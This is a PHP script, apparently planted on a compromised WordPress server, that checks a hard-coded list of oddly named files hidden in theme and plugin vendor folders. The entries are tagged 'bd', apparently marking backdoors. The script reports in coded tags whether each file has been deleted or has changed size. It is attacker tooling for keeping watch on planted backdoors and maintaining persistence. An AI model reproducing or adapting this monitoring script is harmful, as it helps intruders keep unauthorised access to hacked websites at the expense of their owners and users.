<?php $r = '/home/rongyvyo/public_html'; $x = ["/wp-content/themes/woodmart/inc/integrations/gutenberg/src/blocks/menu/link_filters.php"=>"bd@@519262@@1495",
"/wp-content/themes/woodmart/inc/admin/modules/options/controls/textarea/class.textarea.php"=>"bd@@521570@@711",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Enums/LocalServicesLeadCreditIssuanceDecisionEnum/functions.inc.php"=>"bd@@1106025@@1019",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/MutateErrorEnum/gallery.lang_nl.php"=>"bd@@1106026@@1113",
"/wp-content/themes/woodmart/inc/modules/layouts/wpb/shortcodes/cart/empty.cart.php"=>"bd@@521578@@607",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/SmartCampaignErrorEnum/webdb_record_add.php"=>"bd@@1106027@@971",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/AdGroupCriterionErrorEnum/admin.php"=>"bd@@1106028@@906",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/AssetGroupErrorEnum/ordering.php"=>"bd@@1106030@@942",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/components/controls/padding/mime.php"=>"bd@@551540@@1566",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Enums/RecommendationTypeEnum/user_profile.php"=>"bd@@1102709@@991",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/SettingErrorEnum/update025.php"=>"bd@@1102710@@983",
"/wp-content/plugins/checkout-plugins-stripe-woo/lib/vendor/stripe-php/lib/Service/BillingPortal/userselect.php"=>"bd@@523126@@1748",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/metadata/Google/Ads/GoogleAds/V20/Common/document_product.php"=>"bd@@1102711@@1025",
"/wp-content/plugins/google-listings-and-ads/vendor/google/protobuf/src/Google/Protobuf/Internal/SourceCodeInfo/sched_defenses.php"=>"bd@@1102712@@928",
"/wp-content/themes/category_template_1755433324/sldebar.php"=>"bd@@337332@@925",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/blocks/gallery-item/preset.php"=>"bd@@338386@@560",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/blocks/carousel-item/str_split.php"=>"bd@@338395@@640"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!'); |